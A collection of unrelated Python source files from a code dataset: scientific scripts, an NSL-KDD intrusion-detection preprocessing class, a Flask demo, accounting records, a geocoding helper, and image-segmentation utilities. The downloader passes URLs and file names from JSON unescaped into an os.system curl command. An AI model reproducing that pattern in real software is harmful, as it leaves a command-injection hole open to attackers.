+{"seq_id":"535881516","text":"\nimport sys\nimport numpy as np\nimport pdb\nfrom INapIKModel import INapIKModel\n\ndef main(argv):\n    '''\n    l = np.array([[.0435, -290.0], [.00015, -1]])\n    v1 = np.array([1.0, .00015])\n    v2 = np.array([1.0, .0034])\n    lambda1 = 0.0\n    lambda2 = -.9565\n\n    lv1 = l.dot(v1)\n    lv2 = l.dot(v2)\n    lambda1v1 = lambda1*v1\n    lambda2v2 = lambda2*v2\n    pdb.set_trace()\n    '''\n\n    '''\n    def zeroI(t):\n        return 0.0\n    # model = INapIKModel.getHighThresholdInstance(i=zeroI)\n    model = INapIKModel.getLowThresholdInstance(i=zeroI)\n    isn = 4.51\n    vsn = -61.0559\n    nsn = .0007\n    res = model.checkStability(i0=isn, v0=vsn, n0=nsn)\n    pdb.set_trace()\n    '''\n\n    v0 = -60.935\n    n0 = .0007\n    gl = 8.0\n    gNa = 20.0\n    gK = 10.0\n    eNa = 60.0\n    mVOneHalf = -20.0\n    mK = 15.0\n    def mInf(v):\n        return(1.0/(1.0+np.exp((mVOneHalf-v)/mK)))\n    mInfV0 = mInf(v=v0)\n    dMInfV0 = 
-1.0/mK*(mInfV0-mInfV0**2)\n a = -gl-gNa*(dMInfV0*(v0-eNa)+mInfV0)-gK*n0\n pdb.set_trace()\n\nif __name__==\"__main__\":\n main(sys.argv)\n","sub_path":"scripts/doCheckTypoCh6_copy.py","file_name":"doCheckTypoCh6_copy.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"342373211","text":"import pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler, LabelEncoder\n\nfrom utils.preprocessing.utils import perform_scaling, inverse_scaling, drop_columns, read_csv\n\n\nclass Preprocess_nslkdd:\n def __init__(self, path):\n self.path = path\n\n self.columns = None\n\n self.scaler = None\n self.pca = None\n self.train_test_dimensions = None\n self.scale_number = 255\n self.cat_column_encoders = {}\n\n self.columns_to_drop = ['difficulty']\n self.cat_cols = ['protocol_type', 'service', 'flag']\n\n self.attack_mapping = {\n 'normal': 'normal',\n\n 'back': 'dos',\n 'land': 'dos',\n 'neptune': 'dos',\n 'pod': 'dos',\n 'smurf': 'dos',\n 'teardrop': 'dos',\n 'apache2': 'dos',\n 'udpstorm': 'dos',\n 'processtable': 'dos',\n 'worm': 'dos',\n\n 'satan': 'probe',\n 'ipsweep': 'probe',\n 'nmap': 'probe',\n 'portsweep': 'probe',\n 'mscan': 'probe',\n 'saint': 'probe',\n\n 'guess_passwd': 'R2L',\n 'ftp_write': 'R2L',\n 'imap': 'R2L',\n 'phf': 'R2L',\n 'multihop': 'R2L',\n 'warezmaster': 'R2L',\n 'warezclient': 'R2L',\n 'spy': 'R2L',\n 'xlock': 'R2L',\n 'xsnoop': 'R2L',\n 'snmpguess': 'R2L',\n 'snmpgetattack': 'R2L',\n 'httptunnel': 'R2L',\n 'sendmail': 'R2L',\n 'named': 'R2L',\n\n 'buffer_overflow': 'U2R',\n 'loadmodule': 'U2R',\n 'rootkit': 'U2R',\n 'perl': 'U2R',\n 'sqlattack': 'U2R',\n 'xterm': 'U2R',\n 'ps': 'U2R'\n }\n\n def set_columns(self, df):\n self.columns = list(df.columns)\n\n def add_cat_column_encoder(self, cat_name, encoder):\n self.cat_column_encoders[cat_name] = encoder\n\n def set_train_test_dimensions(self, train_test_dimensions):\n self.train_test_dimensions = train_test_dimensions\n\n def preprocess(self, x_sv_train, x_usv_train, x_test):\n scaler, x_sv_train, x_usv_train, x_test = perform_scaling(MinMaxScaler(), x_sv_train, x_usv_train, x_test)\n self.scaler = scaler\n\n return x_sv_train, x_usv_train, x_test\n\n def inverse_preprocessing(self, data):\n data = inverse_scaling(self.scaler, data)\n\n df = pd.DataFrame(data=data, columns=self.columns)\n\n for cat_col in self.cat_column_encoders:\n df[cat_col] = df[cat_col].astype(int)\n df[cat_col] = self.cat_column_encoders[cat_col].inverse_transform(df[cat_col])\n\n return df\n\n def initial_processing(self, data):\n initial_columns = [\"duration\", \"protocol_type\", \"service\", \"flag\", \"src_bytes\",\n \"dst_bytes\", \"land\", \"wrong_fragment\", \"urgent\", \"hot\", \"num_failed_logins\",\n \"logged_in\", \"num_compromised\", \"root_shell\", \"su_attempted\", \"num_root\",\n \"num_file_creations\", \"num_shells\", \"num_access_files\", \"num_outbound_cmds\",\n \"is_host_login\", \"is_guest_login\", \"count\", \"srv_count\", \"serror_rate\",\n \"srv_serror_rate\", \"rerror_rate\", \"srv_rerror_rate\", \"same_srv_rate\",\n \"diff_srv_rate\", \"srv_diff_host_rate\", \"dst_host_count\", \"dst_host_srv_count\",\n \"dst_host_same_srv_rate\", \"dst_host_diff_srv_rate\", \"dst_host_same_src_port_rate\",\n \"dst_host_srv_diff_host_rate\", \"dst_host_serror_rate\", \"dst_host_srv_serror_rate\",\n \"dst_host_rerror_rate\", \"dst_host_srv_rerror_rate\", \"label\", \"difficulty\"]\n\n train_data = read_csv(self.path['one'], 
columns=initial_columns)\n test_data = read_csv(self.path['two'], columns=initial_columns)\n\n data = train_data.append(test_data)\n del train_data, test_data\n\n data['label'] = data['label'].map(self.attack_mapping)\n\n data = drop_columns(data, self.columns_to_drop)\n\n for col in self.cat_cols:\n if col in data.columns:\n le = LabelEncoder()\n le.fit(list(data[col].astype(str).values))\n data[col] = le.transform(list(data[col].astype(str).values))\n self.add_cat_column_encoder(col, le)\n\n x_ben = data.loc[data['label'] == 'normal']\n x_fraud = data.loc[data['label'] != 'normal']\n\n x_ben = drop_columns(x_ben, ['label'])\n x_fraud = drop_columns(x_fraud, ['label'])\n\n return x_ben, x_fraud\n","sub_path":"utils/preprocessing/nslkdd.py","file_name":"nslkdd.py","file_ext":"py","file_size_in_byte":4654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"567000597","text":"import json\nfrom pathlib import Path\nfrom urllib import request\nimport os\nimport concurrent.futures as cf\n\nfrom ..utils import mkdir\n\ndef download_file(out_dir, link):\n \"\"\" Downloads a file from link and stores it in a specified\n directory\n\n Parameters\n ----------\n out_dir: Path\n Where the file is to be stored\n \n link: str\n URL of the file\n\n Examples\n --------\n > download_file(\"output.dat\", url)\n \"\"\"\n os.system('curl \"{}\" -o \"{}\"'.format(link, out_dir))\n\ndef atexit_restore(dir):\n \"\"\" Make sure the working directory is restored\n even if script is terminated (for Jupyter notebook)\n\n Parameters\n ----------\n dir: Path\n The working directory to be restored\n \n Examples\n --------\n > os.chdir(temporary_path)\n > atexit_restore(origin_path)\n \"\"\"\n import atexit\n def exit_handler():\n os.chdir(dir)\n atexit.register(exit_handler)\n\ndef download_all(input_dir, output_dir=None):\n \"\"\" Downloads all the links in jazz.json and classical.json\n Creates the jazz/ and classical/ directories if not already\n there\n\n Parameters\n ----------\n input_dir: Path\n Directory where the json files are\n \n output_dir: Union(None, Path)\n Where the downloaded files are to be stored. 
By default,\n it's the same as the input_dir\n \n Examples\n --------\n > download_all(dir_json_is_in, Path(\"output\"))\n \"\"\"\n \n if output_dir is None:\n output_dir = input_dir\n\n current_dir = os.getcwd() # to be restored later\n input_dir = input_dir.resolve()\n output_dir = output_dir.resolve() # resolve first, since we're changing working directory\n\n os.chdir(input_dir)\n atexit_restore(current_dir)\n\n NUM_CPUS = None # defaults to all available\n for input_file in input_dir.glob(\"*.json\"):\n mkdir(input_file.stem)\n with cf.ProcessPoolExecutor(NUM_CPUS) as pp: # for multi-threading\n if not Path(input_file).exists():\n raise \"JSON File does not exist\"\n with open(input_file, \"r\") as f:\n data = json.load(f)\n for d in data:\n dl_url = Path(d[\"dl\"]) \n out_name = output_dir / input_file.stem / dl_url.name.lower()\n\n pp.submit(download_file, out_name, str(dl_url))\n \n os.chdir(current_dir) # restore working directory","sub_path":"src/data/acquire_data/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"144249003","text":"# 模板变量\n# 代码中传入字符串、列表、字典到模板中\n\nfrom flask import Flask,render_template\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef index():\n # 往模板中传入的数据\n my_str = 'Hello Word'\n my_int = 10\n my_array = [3,4,2,1,7,9]\n my_dict = {\n \"name\":\"xiaoming\",\n \"age\":18\n }\n\n return render_template(\"hello1.html\",\n my_str=my_str,\n my_int=my_int,\n my_array=my_array,\n my_dict=my_dict)\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n","sub_path":"after/1122/Falsk模板/demo2.py","file_name":"demo2.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"250563889","text":"#encoding: utf-8\nfrom OpenOrange import *\nfrom Currency import Currency\nfrom Cheque import Cheque\n\nParentChequeBounce = SuperClass(\"ChequeBounce\", \"FinancialTrans\", __file__)\nclass ChequeBounce(ParentChequeBounce):\n\n OperationTypes = [\"ChequeBounceo\",\"Venta\",\"Rechazo\"]\n\n def defaults(self):\n ParentChequeBounce.defaults(self)\n self.TransDate = today()\n self.OperationType = 0\n self.Type = 0\n\n def check(self):\n result = ParentChequeBounce.check(self)\n if not result: return result\n cheque = Cheque.bring(self.ChequeNr)\n if not cheque: return True\n if self.unconfirming():\n if not (cheque.Status == 7):\n return self.FieldErrorResponse(\"CHEQUESTATUSERR\",\"ChequeNr\")\n else:\n if (self.OperationType==0) and not (cheque.Status == 2 or cheque.Status == 6):\n return self.FieldErrorResponse(\"CHEQUESTATUSERR\",\"ChequeNr\")\n if (self.OperationType==1) and (cheque.Status != 1):\n return self.FieldErrorResponse(\"CHEQUESTATUSERR\",\"ChequeNr\")\n if (self.OperationType==2) and (cheque.Status != 3):\n return self.FieldErrorResponse(\"CHEQUESTATUSERR\",\"ChequeNr\")\n if (not self.ChequeNr):\n return self.FieldErrorResponse(\"NONBLANKERR\",\"ChequeNr\")\n return result\n\n def pasteChequeNr(self):\n cheque = Cheque.bring(self.ChequeNr)\n if (cheque):\n self.CustCode = cheque.CustCode\n self.CustName = cheque.CustName\n self.Total = cheque.Amount\n if (self.OperationType==0):\n from Deposit import Deposit\n chqdep = cheque.getDeposit()\n if chqdep:\n self.FinIdent = chqdep.FinIdent\n else:\n self.CustCode = None\n self.CustName = None\n self.Total = None\n self.FinIdent = None\n\n def beforeInsert(self):\n res = 
ParentChequeBounce.beforeInsert(self)\n if not res: return res\n if self.confirming():\n res = self.changeChequeStatus()\n if not res: return res\n return True\n\n def beforeUpdate(self):\n res = ParentChequeBounce.beforeUpdate(self)\n if not res: return res\n if self.confirming() or self.unconfirming():\n res = self.changeChequeStatus(self.unconfirming())\n if not res: return res\n return True\n\n def invalidate(self):\n res = ParentChequeBounce.invalidate(self)\n if not res: return res\n return self.changeChequeStatus(True)\n\n def getNLTTrans(self):\n from NLT import NLT\n nlt = NLT()\n nlt.OriginType = self.Origin[self.name()]\n nlt.OriginNr = self.SerNr\n if nlt.load():\n return nlt\n return None\n\n def getNLTComment(self):\n res = tr(\"Cheque Bounce\")\n return res\n\n def genNLTTrans(self):\n from AccountSettings import AccountSettings\n ac = AccountSettings.bring()\n from FinAccount import FinAccount\n from Cheque import Cheque\n nlt = self.NLTSetup()\n if self.OperationType == 0: #Rechazo bancario\n nlt.addRow(ac.BouncedChqAcc, \"\", self.Total,self.Currency,self.CurrencyRate,self.BaseRate)\n fa = FinAccount.bring(self.FinIdent)\n cheque = Cheque.bring(self.ChequeNr)\n text = \"ChqNro: (%s)\" % (cheque.ChequeNr)\n nlt.addRow(fa.Account, \"\", -self.Total,self.Currency,self.CurrencyRate,self.BaseRate,text)\n elif self.OperationType == 1: #Rechazo interno\n nlt.addRow(ac.InternalBouncedChqAcc, \"\", self.Total,self.Currency,self.CurrencyRate,self.BaseRate)\n cheque = Cheque.bring(self.ChequeNr)\n ba = cheque.getBridgeAccount()\n if ba:\n nlt.addRow(ba,\"\",-self.Total,self.Currency,self.CurrencyRate,self.BaseRate)\n elif self.OperationType == 2: #Rechazo endoso\n nlt.addRow(ac.BouncedChqAcc, \"\", self.Total,self.Currency,self.CurrencyRate,self.BaseRate)\n nlt.addRow(ac.BouncedChqDueAcc, \"\", -self.Total,self.Currency,self.CurrencyRate,self.BaseRate)\n nlt.balance()\n nlt.sumUp()\n return nlt.save()\n\n def changeChequeStatus(self,Revert=False):\n cheque = Cheque.bring(self.ChequeNr)\n if not Revert:\n cheque.Status = Cheque.BOUNCED\n else:\n if self.OperationType == 0:\n cheque.Status = Cheque.DEPOSITED\n elif self.OperationType == 1:\n cheque.Status = Cheque.INPORTFOLIO\n elif self.OperationType == 2:\n cheque.Status = Cheque.ENDOSED\n return cheque.store()\n\n def genDebitNote(self):\n from Invoice import Invoice,InvoiceItemRow\n dnote = Invoice()\n dnote.defaults()\n dnote.CustCode = self.CustCode\n dnote.pasteCustCode()\n dnote.InvoiceType = 2\n dnote.OriginNr = self.SerNr\n dnote.OriginType = dnote.Origin[self.name()]\n from FinSettings import FinSettings\n fset = FinSettings.bring()\n from TaxSettings import TaxSettings\n tset = TaxSettings.bring()\n\n #Item de cheque\n from Cheque import Cheque\n chq = Cheque.bring(self.ChequeNr)\n irow = InvoiceItemRow()\n irow.ArtCode = fset.ChqBounceItem\n irow.pasteArtCode(dnote)\n \n irow.Name = \"%s - Chq. Nr. 
%s - %s\" %(irow.Name,chq.ChequeNr,chq.BankName)\n irow.Qty = 1\n irow.VATCode = tset.getExcemptVATCode()\n irow.Price = self.Total\n irow.pastePrice(dnote)\n irow.sumUp(dnote)\n dnote.Items.append(irow)\n\n if (fset.ChqBounceBankCostItem):\n irow = InvoiceItemRow()\n irow.ArtCode = fset.ChqBounceBankCostItem\n irow.pasteArtCode(dnote)\n irow.Qty = 1\n irow.pasteQty(dnote)\n irow.sumUp(dnote)\n dnote.Items.append(irow)\n dnote.sumUp()\n return dnote","sub_path":"standard/records/ChequeBounce.py","file_name":"ChequeBounce.py","file_ext":"py","file_size_in_byte":6019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"311488838","text":"'''\nCreated on Feb 27, 2019\nconstruct corest using \"uniform\" subsampling method\n\n@author: Ying Cai, Wenxing Zhang\n'''\nimport numpy as np\nimport argparse\n\ndef fwrite_vector(f, vec):\n for item in vec:\n f.write(str(item)+' ')\n \n\nif __name__ == '__main__':\n \n parser = argparse.ArgumentParser(description='Lightweight coreset construction')\n parser.add_argument('filename', type=str, help='file name')\n parser.add_argument('numOfVariable', type=int, help='number of attributes') \n parser.add_argument('samplesize', type=int, help='coreset size')\n parser.add_argument('--numOfCorset', type=int, default=1, help='number of coresets to construct')\n args = parser.parse_args()\n numOfVariable = args.numOfVariable\n filename = args.filename\n samplesize = args.samplesize\n numOfCorset = args.numOfCorset\n \n dataset=[]\n with open(filename) as fn:\n for line in fn:\n data = line.split()\n data[numOfVariable-1] = data[numOfVariable-1].strip()\n vlist=[]\n for value in data:\n vlist.append(float(value))\n dataset.append(vlist)\n\n fn.close()\n \n \n nsize = len(dataset)\n \n size=[]\n \n for x in range(nsize):\n size.append(x)\n \n for sampleTimes in range(numOfCorset):\n chosen = np.random.choice(size, samplesize, replace=False)\n with open(filename[:-4]+'_UNIFORM_'+str(samplesize)+\"_\"+str(sampleTimes+1) + \".txt\",'w',encoding='utf-8') as f:\n for item in chosen:\n fwrite_vector(f, dataset[item])\n f.write('\\n')\n f.close()\n","sub_path":"NewVersion/sourcecode/uniform.py","file_name":"uniform.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"123051089","text":"\"\"\"Reverse of a given number.\n\nAlgo\n----\n\n00. Start\n01. Read a number n\n02. rev = 0\n03. i = n\n04. rem = i%10 This gives the last digit in the number\n05. rev = rev * 10 + rem\n06. i = i // 10 This gives the rest of the number without the last digit\n07. if i > 0 go to step 04\n08. Print rev\n09. 
Stop\n\n\nn i rem rev\n1234 0\n 1234 4 0*10 + 4 = 4\n 123 3 4*10 + 3 = 43\n 12 2 43*10 + 2 = 432\n 1 1 432*10 + 1 = 4321\n 0\n\n\n10) 1 (0\n 0\n ---\n 1\n\n1 % 10 = 1\n1 // 10 = 0\n\n\nFor loop in C based programming languages\n\nfor(int i=0; i <10; i = i+1){\n ...\n ...\n}\n\nfor(Starting; condition; incrementing){\n\n}\n\nfor(;0 == 0;) -> Infinite for loop\n\"\"\"\n\n\ndef get_reverse(n):\n \"\"\"Get reverse of a number.\"\"\"\n rev = 0\n i = n\n while i > 0:\n rem = i % 10\n rev = rev * 10 + rem\n i = i // 10\n\n return rev\n\n\ndef test_get_reverse():\n \"\"\"Test get reverse of a number.\"\"\"\n assert get_reverse(1234) == 4321\n assert get_reverse(3445) == 5443\n","sub_path":"practise-project/src/Week03/test_reverse_of_a_number_sol_2.py","file_name":"test_reverse_of_a_number_sol_2.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"11608065","text":"\"\"\"\n Copyright 2006-2008 SpringSource (http://springsource.com), All Rights Reserved\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License. \n\"\"\"\nimport logging\nfrom springpython.container import ObjectContainer\nfrom springpython.remoting.pyro import PyroProxyFactory\n\nclass ApplicationContext(ObjectContainer):\n \"\"\"\n ApplicationContext IS a ObjectContainer. 
It also has the ability to define the lifecycle of\n objects.\n \"\"\"\n def __init__(self, config=None):\n super(ApplicationContext, self).__init__(config)\n self.logger = logging.getLogger(\"springpython.context.ApplicationContext\")\n self.types_to_avoid = [PyroProxyFactory]\n \n for object_def in self.object_defs.values():\n self._apply(object_def)\n \n for configuration in self.configs:\n self._apply(configuration)\n\n for object_def in self.object_defs.values():\n if not object_def.lazy_init and object_def.id not in self.objects:\n self.logger.debug(\"Eagerly fetching %s\" % object_def.id)\n self.get_object(object_def.id)\n\n post_processors = [object for object in self.objects.values() if isinstance(object, ObjectPostProcessor)]\n\n for obj_name, obj in self.objects.iteritems():\n if not isinstance(obj, ObjectPostProcessor):\n for post_processor in post_processors:\n self.objects[obj_name] = post_processor.post_process_before_initialization(obj, obj_name)\n\n\n for object in self.objects.values():\n self._apply(object)\n\n for obj_name, obj in self.objects.iteritems():\n if not isinstance(obj, ObjectPostProcessor):\n for post_processor in post_processors:\n self.objects[obj_name] = post_processor.post_process_after_initialization(obj, obj_name)\n \n def _apply(self, obj):\n if len([True for type_to_avoid in self.types_to_avoid if isinstance(obj, type_to_avoid)]) == 0: \n if hasattr(obj, \"after_properties_set\"):\n obj.after_properties_set()\n #if hasattr(obj, \"post_process_after_initialization\"):\n # obj.post_process_after_initialization(self)\n if hasattr(obj, \"set_app_context\"):\n obj.set_app_context(self)\n \n\nclass ObjectPostProcessor(object):\n def post_process_before_initialization(self, obj, obj_name):\n return obj\n def post_process_after_initialization(self, obj, obj_name):\n return obj\n\nclass ApplicationContextAware(object):\n def __init__(self):\n self.app_context = None\n \n def set_app_context(self, app_context):\n self.app_context = app_context\n\nclass ObjectNameAutoProxyCreator(ApplicationContextAware, ObjectPostProcessor):\n \"\"\"\n This object will iterate over a list of objects, and automatically apply\n a list of advisors to every callable method. 
This is useful when default advice\n needs to be applied widely with minimal configuration.\n \"\"\"\n def __init__(self, objectNames=[], interceptorNames=[]):\n super(ObjectNameAutoProxyCreator, self).__init__()\n self.objectNames = objectNames\n self.interceptorNames = interceptorNames\n\n","sub_path":"thirdpart/springpython-1.0.0.RELEASE/springpython/context/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"456024832","text":"import requests\nimport json\nfrom myproject.settings import GOOGLE_API_KEY\n\n# address = 'Khadakpada, Kalyan West, Maharashtra, India'\n#\n# address2 = 'IIT BOMBAY, Powai, Mumbai'\n#\n# address3 = 'Naupada, Thane, India'\n\n\ndef get_pincode(address):\n key = GOOGLE_API_KEY\n\n url = \"https://maps.googleapis.com/maps/api/geocode/json?address={}&key={}\".format(address, key)\n\n response = requests.get(url)\n\n#response.text converts it to string in json format\n#json.loads converts it to python dictionary\n response_dictionary = json.loads(response.text)\n\n if response_dictionary['status'] == 'OK':\n for address_component in response_dictionary['results'][0]['address_components']:\n if 'postal_code' in address_component['types']:\n return address_component['long_name']\n\n#print(get_pincode('Bldg. no. 16, Nebula Darshan, Khadakpada, Kalyan West, Maharashtra, India'))","sub_path":"accounts/Pincode.py","file_name":"Pincode.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"572307341","text":"# _*_ coding:utf-8 _*_\\\r\nimport requests#导入模块\r\nimport obsear\r\nurl = 'http://www.ycgwl.com/Mobile/index.aspx' #url统一资源定位符\r\n# def download_img(url):\r\nresponse = requests.get(url) #发送请求,下载数据\r\n# print response.text #输出网页源码\r\nhtml = response.text\r\n# # \r\nimg_url = obsear.findall(r'= 2:\n is_taken[col, row] = 1\n contours.append([col, row])\n for i in range(len(contours)):\n self.img[contours[i][0], contours[i][1]] = color\n\n def _get_patches(self):\n \"\"\"\n Get patches used in CNN\n :return: \n \"\"\"\n patches = []\n pad_width = self.expand_space\n pad_img = np.pad(self.img, ((pad_width, pad_width), (pad_width, pad_width), (0, 0)), 'symmetric')\n for i in range(self.num_of_centers):\n [center_y, center_x] = np.array(np.average(np.column_stack(np.where(\n self.clusters == i)\n ), axis=0)).astype(int)\n center_x += pad_width\n center_y += pad_width\n patch = pad_img[center_y-pad_width:center_y+pad_width, center_x-pad_width:center_x+pad_width]\n patches.append(patch)\n self.patches = np.array(patches)\n\n def _get_depth(self):\n \"\"\"\n Get average depth of each superpixels which used as CNN label\n \"\"\"\n depths = []\n for i in range(self.num_of_centers):\n idx = (self.clusters == i)\n avg_depth = np.average(self.input_depth[idx])\n depths.append(avg_depth)\n self.depth = np.reshape(depths, [self.num_of_centers, 1])\n\n def get_pixel_based_depth(self):\n \"\"\"\n Convert sp-based depth to pixel-based depth\n \"\"\"\n try:\n assert len(self.depth) > 0\n except AssertionError:\n print('depth empty')\n exit(1)\n depth_map = np.zeros([self.height, self.width])\n for i in range(len(self.depth)):\n idx = (self.clusters == i)\n d = self.depth[i]\n depth_map[idx] = d\n return depth_map\n\n def get_texture_map(self):\n def _threshold(c, pixels):\n out = []\n for p in pixels:\n out.append(1) if _vec_greater(p, c) else out.append(0)\n return 
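# Editor's sketch (aside, not part of the original record): the superpixel code
# around this point builds an LBP texture map both by hand and via scikit-image's
# local_binary_pattern (imported as `lbp` in the record). A minimal standalone
# equivalent, on a hypothetical image:
import numpy as np
from skimage.color import rgb2gray
from skimage.feature import local_binary_pattern

img = np.random.rand(64, 64, 3)                           # hypothetical RGB image
texture = local_binary_pattern(rgb2gray(img), P=8, R=1)   # 8 neighbours, radius 1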
out\n\n def _vec_greater(l1, l2):\n def norm(item): return np.sum(np.square(item))\n return True if norm(l1) >= norm(l2) else False\n\n def _get_pixel_else_0(l, idy, idx):\n try:\n return l[idy][idx]\n except IndexError:\n return np.array([0.0, 0.0, 0.0])\n texture_map = np.zeros(self.img.shape)\n direction = [[-1, -1], [-1, 0], [-1, 1], [0, 1], [1, 1], [1, 0], [1, -1], [0, -1]]\n for y in range(self.height):\n for x in range(self.width):\n center = self.img[y, x]\n surround = []\n for d in direction:\n surround.append(_get_pixel_else_0(self.img, y+d[0], x+d[1]))\n values = _threshold(center, surround)\n weights = [1, 2, 4, 8, 16, 32, 64, 128]\n res = 0\n # 2 to 10\n for v in range(len(values)):\n res += weights[v] * values[v]\n texture_map[y, x] = res\n return texture_map\n\n def _get_cluster_pixels(self):\n \"\"\"\n Get superpixels \n \"\"\"\n self.superpixels.clusters = self.clusters\n # texture_map = self.get_texture_map()\n texture_map = lbp(ski_color.rgb2gray(self.img), 8, 1)\n sp_list = []\n for i in range(self.num_of_centers):\n idx = self.clusters == i\n colors = self.img[idx]\n textures = texture_map[idx]\n sp = SuperPixel(colors, textures)\n sp_list.append(sp)\n self.superpixels.sp_list = sp_list\n\n\nif __name__ == '__main__':\n print('test')\n","sub_path":"data_process/superpixel_process.py","file_name":"superpixel_process.py","file_ext":"py","file_size_in_byte":11315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"420170635","text":"import matplotlib\nimport matplotlib.pyplot as plt\n\nimport os\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom configs.Config_chd import get_config\nfrom utilities.file_and_folder_operations import subfiles\n\ndef reshape_array(numpy_array, axis=1):\n image_shape = numpy_array.shape[1]\n channel = numpy_array.shape[0]\n if axis == 1:\n slice_img = numpy_array[:, 0, :, :].reshape(1, channel, image_shape, image_shape)\n slice_len = np.shape(numpy_array)[1]\n for k in range(1, slice_len):\n slice_array = numpy_array[:, k, :, :].reshape(1, channel, image_shape, image_shape)\n slice_img = np.concatenate((slice_img, slice_array))\n return slice_img\n elif axis == 2:\n slice_img = numpy_array[:, :, 0, :].reshape(1, channel, image_shape, image_shape)\n slice_len = np.shape(numpy_array)[2]\n for k in range(1, slice_len):\n slice_array = numpy_array[:, :, k, :].reshape(1, channel, image_shape, image_shape)\n slice_img = np.concatenate((slice_img, slice_array))\n return slice_img\n elif axis == 3:\n slice_img = numpy_array[:, :, :, 0].reshape(1, channel, image_shape, image_shape)\n slice_len = np.shape(numpy_array)[3]\n for k in range(1, slice_len):\n slice_array = numpy_array[:, :, :, k].reshape(1, channel, image_shape, image_shape)\n slice_img = np.concatenate((slice_img, slice_array))\n return slice_img\n\nif __name__ == '__main__':\n c = get_config()\n \"\"\" \n data_dir = c.data_dir\n image_num = '1016'\n scaled_image_dir = os.path.join(c.data_dir, 'scaled_to_16')\n scaled_image = os.path.join(c.data_dir, 'ct_1083_image.npy')\n\n train_image = np.load(scaled_image)\n label_image = np.load(scaled_image)[:, 1]\n\n max_value = label_image.max()\n plt.imshow(train_image[12], cmap='gray')\n plt.show()\n plt.imshow(val_image[12], cmap='gray')\n plt.show()\n \n pred_dir = os.path.join(c.base_dir, c.dataset_name\n + '_' + str(\n c.batch_size) + c.cross_vali_result_all_dir + '_20190425-213808')\n \n\n test_num = c.dataset_name + '_006'\n image_dir = os.path.join(pred_dir, 
'results', 'pred_' + test_num + '.npy')\n\n\n # all_image = np.load(image_dir)[25]\n\n\n plt.figure(1)\n for i in range(np.shape(all_image)[0]):\n plt.subplot(1,3,i+1)\n plt.imshow(train_image[i], cmap='gray')\n if i == 0:\n plt.xlabel('original image')\n elif i == 1:\n plt.xlabel('label image')\n else:\n plt.xlabel('segmented image')\n\n if not os.path.exists(os.path.join(pred_dir, 'images')):\n os.makedirs(os.path.join(pred_dir, 'images'))\n\n plt.savefig(os.path.join(pred_dir, 'images') + '/_006_25.jpg')\n plt.show()\n \"\"\"\n n = 4\n k = 115\n scaled_16_files = subfiles(c.scaled_image_16_dir, suffix='.npy', join=False)\n pred_32_files = subfiles(c.stage_1_dir_32, suffix='64.npy', join=False)\n org_files = subfiles(c.data_dir, suffix='.npy', join=False)\n\n ############ original image and target ########################\n file = org_files[2]\n data = np.load(os.path.join(c.data_dir, file))\n data = reshape_array(data, axis=3)\n\n image = data[:, 0]\n target = data[:, 1]\n\n ############ down scale using interpolation ########################\n data = torch.tensor(data)\n data_256 = F.interpolate(data, scale_factor=1/16, mode='bilinear')\n image_256 = data_256[:, 0]\n target_256 = data_256[:, 1]\n \n plt.figure(1)\n plt.subplot(2, 2, 1)\n plt.title('image:%d, slice:%d, original image' % (n, k))\n plt.imshow(image[k], cmap='gray')\n plt.subplot(2, 2, 2)\n plt.title('image:%d, slice:%d, original target' % (n, k))\n plt.imshow(target[k], cmap='gray')\n plt.subplot(2, 2, 3)\n plt.title('image:%d, slice:%d, image scale by 0.5' % (n, k))\n plt.imshow(image_256[k], cmap='gray')\n plt.subplot(2, 2, 4)\n plt.title('image:%d, slice:%d, target scale by 0.5' % (n, k))\n plt.imshow(target_256[k], cmap='gray')\n plt.show()\n\n ############ down scale using max-pooling ########################\n file_64 = pred_32_files[n]\n pred_64 = np.load(os.path.join(c.stage_1_dir_32, file_64))[:, 0:8]\n target_64 = np.load(os.path.join(c.stage_1_dir_32, file_64))[:, 8:9]\n\n pred_64 = torch.tensor(pred_64).float()\n target_64 = torch.tensor(target_64).long()\n\n # 32*32 image and target\n data_32 = np.load(os.path.join(c.scaled_image_32_dir, 'ct_1010_image.npy'))\n image_32 = data_32[:, 0]\n target_32 = data_32[:, 1]\n\n soft_max = F.softmax(pred_64[k:k + 1], dim=1)\n cf_img = torch.max(soft_max, 1)[0].numpy()\n pred_img = torch.argmax(soft_max, dim=1)\n\n # plot target\n plt.figure(2)\n plt.subplot(2, 2, 1)\n plt.title('image:%d, slice:%d, confidence' % (n, k))\n plt.imshow(cf_img[0], cmap='gray')\n plt.subplot(2, 2, 2)\n plt.title('image:%d, slice:%d, target' % (n, k))\n plt.imshow(target_64[k][0], cmap='gray')\n plt.subplot(2, 2, 3)\n plt.title('image:%d, slice:%d, pred_image' % (n, k))\n plt.imshow(pred_img[0], cmap='gray')\n plt.show()\n\n 